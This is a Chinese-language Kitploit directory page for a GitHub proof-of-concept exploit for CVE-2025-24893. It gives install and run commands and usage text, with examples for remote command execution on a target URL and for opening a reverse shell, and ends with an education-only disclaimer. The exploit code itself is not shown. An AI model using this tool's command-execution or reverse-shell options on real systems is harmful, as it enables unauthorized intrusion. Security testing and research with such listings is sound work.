Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24893-POC | Kitploit
工具/GitHubGitHub/th3gl0w/cve-2025-24893-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubth3gl0w/cve-2025-24893-poc

CVE-2025-24893-POC

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-24893

安装 bun:

root@kitploit:~
curl -fsSL https://bun.com/install | bash

安装依赖:

root@kitploit:~
bun install

运行:

root@kitploit:~
bun run CVE-2025-24893.ts

本项目是使用 bun v1.2.19 的 bun init 创建的。Bun 是一个快速的一体化 JavaScript 运行时。

使用方法:

root@kitploit:~
Usage: bun CVE-2025-24893.ts [options]

Options:
  -u, --url <url>           The target URL to interact with.
  -i, --ip <ip-address>     The IP address for a reverse shell connection.
  -p, --port <port-number>  The port number for the reverse shell.
  -r, --rverse              Open a reverse shell connection.
  -c, --cmd <command>       Execute a specific command.

Examples:
  # Execute a command on a target URL
  bun CVE-2025-24893.ts --url http://example.com --cmd "ls -la"

  # Open a reverse shell
  bun CVE-2025-24893.ts --rverse --ip 127.0.0.1 --port 4444

免责声明

此漏洞利用工具及指南仅供教育目的使用。请负责任地使用此信息,并且仅在你拥有明确测试权限的系统上使用。未经授权利用系统是非法且不道德的行为。作者和贡献者不对因使用此信息而造成的任何误用或损害负责。

下载工具